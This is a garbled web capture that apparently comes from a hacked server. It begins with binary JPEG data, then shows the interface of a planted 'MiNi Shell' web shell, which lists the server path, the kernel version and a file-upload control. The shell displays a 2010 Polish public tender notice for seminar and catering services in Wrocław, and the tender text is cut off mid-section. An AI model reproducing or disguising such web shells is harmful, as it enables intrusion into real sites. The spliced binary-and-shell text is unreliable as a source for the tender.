JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100505/124430-N-2010.html

<p class="kh_header"><b>Wrocław: Przedmiotem  zamówienia publicznego są usługi w zakresie organizacji seminariów wraz z wynajmem sal oraz obsługą cateringową dla uczestników projektu systemowego realizowanego przez Dolnośląski Ośrodek Polityki Społecznej.</b><br>
<b>Numer ogłoszenia: 124430 - 2010; data zamieszczenia: 05.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Ośrodek Polityki Społecznej , ul. Ostrowskiego 7, 53-237 Wrocław, woj. dolnośląskie, tel. 0-71 784 57 53, faks 0-71 784 57 51.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem  zamówienia publicznego są usługi w zakresie organizacji seminariów wraz z wynajmem sal oraz obsługą cateringową dla uczestników projektu systemowego realizowanego przez Dolnośląski Ośrodek Polityki Społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia publicznego są usługi w zakresie organizacji seminariów wraz z wynajmem sal oraz obsługą cateringową dla uczestników projektu systemowego realizowanego przez Dolnośląski Ośrodek Polityki Społecznej.                 
Zadanie nr 1 - usługi w zakresie organizacji seminarium  otwierającego projekt wraz z wynajmem sali oraz obsługą cateringową dla uczestników projektu systemowego realizowanego przez Dolnośląski Ośrodek Polityki Społecznej.
Zadanie nr 2 - usługi w zakresie organizacji seminariów tematycznych wraz z wynajmem sali oraz obsługą cateringową dla uczestników projektu systemowego, realizowanego przez Dolnośląski Ośrodek Polityki Społecznej.
Zadanie nr 3 - usługi w zakresie organizacji seminarium zamykającego projekt wraz z wynajmem sali oraz obsługą cateringową dla uczestników projektu systemowego, realizowanego przez Dolnośląski Ośrodek Polityki Społecznej.
Zadanie realizowane w ramach projektu systemowego współfinansowanego z Europejskiego Funduszu Społecznego  
Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej.
Priorytet VII Promocja integracji społecznej
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji.
Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 55.30.00.00-3, 70.22.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca załączy do oferty aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust 1 pkt 2 ustawy Pzp wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w przypadku do osób fizycznych oświadczenie w zakresie art. 24 ust 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, ze w ciągu ostatnich 3 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali minimum jedną usługę odpowiadającą swoim rodzajem i wielkością usługom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli wykonawca załączy do swojej oferty podpisany załącznik 2a i/lub, 2b i/lub 2c do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli wykonawca załączy do swojej oferty podpisany załącznik 2a i/lub, 2b i/lub 2c do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli wykonawca załączy do swojej oferty podpisany załącznik 2a i/lub, 2b i/lub 2c do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w treści umowy mogą dotyczyć jedynie:
-zmian cen w przypadku zmiany stawek podatku VAT na podstawie obowiązujących przepisów prawnych w tym zakresie.
- zmiany danych teleadresowych Wykonawcy i/lub Zamawiającego;
- zamiana osób upoważnionych do dokonywania czynności prawnych;	Jako odrębny załącznik nr 6a i/lub 6b i/lub 6c do SIWZ, Zamawiający zamieścił wzory umów, która określają warunki umowne realizacji przedmiotu zamówienia publicznego dla zadania na które wykonawca złoży swoją ofertę.
- zmiana numeru konta bankowego Wykonawcy;
- zmiana terminu seminarium/seminariów
- zmiana liczby uczestników seminarium/seminariów
- zmiana ilości seminariów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dops.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Ośrodek Polityki Społecznej ul. Ostrowskiego 7, 53-238 Wrocław pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 10:00, miejsce: Dolnośląski Ośrodek Polityki Społecznej ul. Ostrowskiego 7, 53-238 Wrocław pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach projektu systemowego współfinansowanego z Europejskiego Funduszu Społecznego  
Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej.
Priorytet VII Promocja integracji społecznej
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji.
Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Przedmiotem zamówienia są usługi w zakresie organizacji seminarium  otwierającego projekt wraz z wynajmem sali oraz obsługą cateringową dla uczestników projektu systemowego realizowanego przez Dolnośląski Ośrodek Polityki Społecznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien wskazać co najmniej 3 terminy organizacji seminarium w  okresie opisanym w Rozdziale IV p. 1 SIWZ. Zamawiający wskaże 1 wybrany termin seminarium spośród 3 zaproponowanych przez Wykonawcę.
Seminarium winno odbyć się w dzień roboczy w godzinach 8:00 - 16:00. Seminarium musi zostać zorganizowane na terenie miasta Wrocław. Szczegółowe określenie terminu przeprowadzenia usługi będzie ustalane z wybranym Wykonawcą w terminie do 7 dni przed datą rozpoczęcia seminarium.	Zakres świadczonej usługi obejmuje:
przygotowanie punktu rejestracji uczestników Seminarium od godziny 8.00 do 16.00, 
zapewnienie Sali seminaryjnej na minimum 50 osób z niezbędnym wyposażeniem 
Zapewnienie uczestnikom w czasie trwania seminarium 2 przerw kawowych uzupełnianych oraz lunch w formie szwedzkiego stołu dla każdego uczestnika. Propozycję menu Wykonawca winien dołączyć do oferty.
 Przygotowanie pierwszej  i drugiej przerwy kawowej uzupełnianej dla uczestników seminariów obejmuje:
1) Kawę czarną z ekspresu w filiżankach po jednej na osobę, 
2) Herbatę czarną tradycyjną w filiżankach po jednej na osobę,
3) Ciastka/herbatniki  - min. 50 gram na osobę,
4) Woda mineralna gazowana, niegazowana, soki (2 rodzaje) - 0,25l na osobę, soki 2 rodzaje po 0,25 ml na osobę
5) Cukier, śmietanka do kawy, cytryna do herbaty dla wszystkich uczestników.
 Lunch dla uczestników seminarium otwierającego w formie szwedzkiego stołu obejmuje:
1) Kawę czarną z ekspresu w filiżankach po jednej na osobę,
2) Herbatę czarną tradycyjną w filiżankach  po jednej na osobę,
3) Woda mineralna gazowana, niegazowana, soki - 0,25l na osobę, soki 2 rodzaje po 0,25ml na osobę
4) Cukier, śmietanka do kawy, cytryna do herbaty dla wszystkich uczestników
5) Danie główne - 3 rodzaje dań, w tym jedno jarskie, 3 rodzaje sałatek obiadowych dla każdego z uczestników, łącznie 50 posiłków. 
d) Udostępnienie uczestnikom projektu odpowiedniego sprzętu i warunków lokalowych, gwarantujących wysoki poziom usługi, w tym sala seminaryjna na minimum 50 osób wyposażona w projektor multimedialny, ekran, laptop nagłośnienie - dostępną dla uczestników projektu w godz. od 08.00 do 16.00.
Projekt Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
 W sali, w której będzie odbywać się Seminarium musi być zawieszony plakat projektu Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Plakaty dostarczy Zamawiający.
 Zamówienie należy wykonać w terminie - I dekada czerwca 2010r. - w dzień roboczy w godz. 8.00 - 16.00.  Cena usługi musi zawierać całkowity koszt przedmiotu zamówienia (organizacje seminarium, wyżywienie, sala, wyposażenie, itp.). Warunkiem zapłaty za usługę będzie spełnienie wszystkich warunków umowy.
 Płatność za usługę będzie dokonywana po zakończeniu seminarium w terminie do 30 dni po odebraniu faktury, rachunku przez Zamawiającego.
 Wykonawca na fakturze, rachunku przedstawia całkowitą kwotę za zrealizowaną seminarium zgodnie z zawartą umową i preliminarzem kosztów.
 Wykonawca załączy do swej oferty szczegółowy opis przedmiotu zamówienia na który złoży swoją ofertę. W opisie tym winny się znaleźć:
- zaproponowane terminy realizacji zamówienia zgodnie z określonymi w załączniku nr 5 do SIWZ.
- miejsce realizacji zamówienia z szczegółowym opisem Sali konferencyjnej, jej wyposażenia,
Wymagany opis, po podpisaniu umowy stanie się jej integralną częścią jako załącznik nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 55.30.00.00-3, 70.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Przedmiotem zamówienia są usługi w zakresie organizacji seminariów tematycznych wraz z wynajmem sali oraz obsługą cateringową dla uczestników projektu systemowego, realizowanego przez Dolnośląski Ośrodek Polityki Społecznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien wskazać co najmniej 3 terminy organizacji seminarium w  okresie opisanym w Rozdziale IV p. 2 SIWZ. W sumie 15 terminów na seminaria tematyczne jako forum wymiany doświadczeń pomiędzy pracownikami OPS i PCPR. 
Seminaria winny odbyć się w dzień roboczy w godzinach 8:00 - 16:00. Każde seminarium to 8 godzin szkoleniowych ( 6 zegarowych).Seminaria muszą zostać zorganizowane na terenie miasta Wrocław. Szczegółowe określenie terminu przeprowadzenia usługi będzie ustalane z wybranym Wykonawcą w terminie do 7 dni przed datą rozpoczęcia każdego z seminarium.	Wykonawca winien wskazać co najmniej 3 terminy w każdym miesiącu.
Realizacja przedmiotu zamówienia planowana jest w miesiącach:
a.	maj - 1 seminarium 
b.	czerwiec - 2 seminaria
c.	lipiec - 2 seminaria 
d.	sierpień - 2 seminaria
e.	wrzesień - 2 seminaria 
f.	październik - 3 seminaria 
g.	listopad- 2 seminaria 
h.	grudzień - 1 seminarium.
Zamawiający zastrzega sobie, z co najmniej tygodniowym wyprzedzeniem, możliwość zmiany terminu Seminarium lub zmiany ilości seminarium.
Zakres świadczonych usług obejmuje:
a)	przygotowanie punktu rejestracji uczestników Seminarium od godziny 8.00 do 16.00, 
b)	zapewnienie Sali na minimum 30 osób na każde seminarium z odpowiednim wyposażeniem.
c)	Zapewnienie uczestnikom w czasie trwania każdego seminarium 2 przerw kawowych uzupełnianych.  Propozycję menu Wykonawca winien dołączyć do oferty. 
Przygotowanie pierwszej przerwy kawowej uzupełnianej dla uczestników seminariów obejmuje:
1) Kawę czarną z ekspresu w filiżankach po jednej na osobę,
2) Herbatę czarną tradycyjną w filiżankach po jednej na osobę,
3) Ciastka/herbatniki - min. 50 gram na osobę,
4) Woda mineralna gazowana, niegazowana, soki (2 rodzaje) - 0,25l na osobę, soki 2 rodzaje po 0,25 ml na osobę
5) Cukier, śmietanka do kawy, cytryna do herbaty dla wszystkich uczestników.
Przygotowanie drugiej przerwy kawowej uzupełnianej dla uczestników seminariów  obejmuje:
1) Kawę czarną z ekspresu w filiżankach po jednej na osobę,
2) Herbatę czarną tradycyjną w filiżankach po jednej na osobę,
3) Ciastka/herbatniki- min. 50 gram. na osobę,
4) Kanapki dekoracyjne na bułce 3 rodzaje po 3 szt. na osobę,
5) Woda mineralna gazowana, niegazowana, soki - 0,25l na osobę, soki 2 rodzaje po 0,25ml na osobę
6) Cukier, śmietanka do kawy, cytryna do herbaty dla wszystkich uczestników.
d) udostępnienie uczestnikom projektu odpowiedniego sprzętu i warunków lokalowych, gwarantujących wysoki poziom usługi, w tym sale seminaryjne na min 30 osób, wyposażone w projektor multimedialny, ekran, laptop nagłośnienie - dostępną dla uczestników projektu w godz. od 08.00 do 16.00.
Projekt Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
2.7	We wszystkich salach, w których będą odbywać się Seminaria muszą być zawieszone plakaty projektu Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej  współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Plakaty dostarczy Zamawiający.
Termin realizacji zamówienia - od dnia podpisania umowy do - 21.12.2010r. wg harmonogramu określonego w Rozdziale III.
 Cena usługi musi zawierać całkowity koszt przedmiotu zamówienia (organizacje seminariów, wyżywienie, sale, wyposażenie, itp.). Warunkiem zapłaty za usługę będzie spełnienie wszystkich warunków umowy.	Płatności za usługę będzie dokonywana w częściach, po zakończeniu każdego seminarium w terminie do 30 dni po odebraniu faktury/rachunku przez Zamawiającego.
Wykonawca na fakturze/rachunku przedstawia całkowitą kwotę za zrealizowane seminarium zgodnie z zawartą umową i preliminarzem kosztów.
Wykonawca załączy do swej oferty szczegółowy opis przedmiotu zamówienia. W opisie tym winny się znaleźć:
- zaproponowane terminy realizacji zamówienia zgodnie z zaproponowanymi w załączniku nr 5 do SIWZ.
- miejsce realizacji zamówienia z szczegółowym opisem Sali konferencyjnej, jej wyposażenia,
- szczegółowe menu zgodnie z opisem zawartym w niniejszym rozdziale.
 Wymagany opis, po podpisaniu umowy stanie się jej integralną częścią jako załącznik nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 55.30.00.00-3, 70.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Przedmiotem zamówienia są usługi w zakresie organizacji seminarium zamykającego projekt wraz z wynajmem sali oraz obsługą cateringową dla uczestników projektu systemowego, realizowanego przez Dolnośląski Ośrodek Polityki Społecznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien wskazać co najmniej 3 terminy organizacji seminarium w  okresie opisanym w Rozdziale IV p. 3 SIWZ. Zamawiający wskaże 1 wybrany termin seminarium spośród 3 zaproponowanych przez Wykonawcę.	Seminarium winno odbyć się w dzień roboczy w godzinach 8:00 - 16:00. Seminarium musi zostać zorganizowane na terenie miasta Wrocław. Szczegółowe określenie terminu przeprowadzenia usługi będzie ustalane z wybranym Wykonawcą w terminie do 7 dni przed datą rozpoczęcia seminarium.
Zakres świadczonej usługi obejmuje:
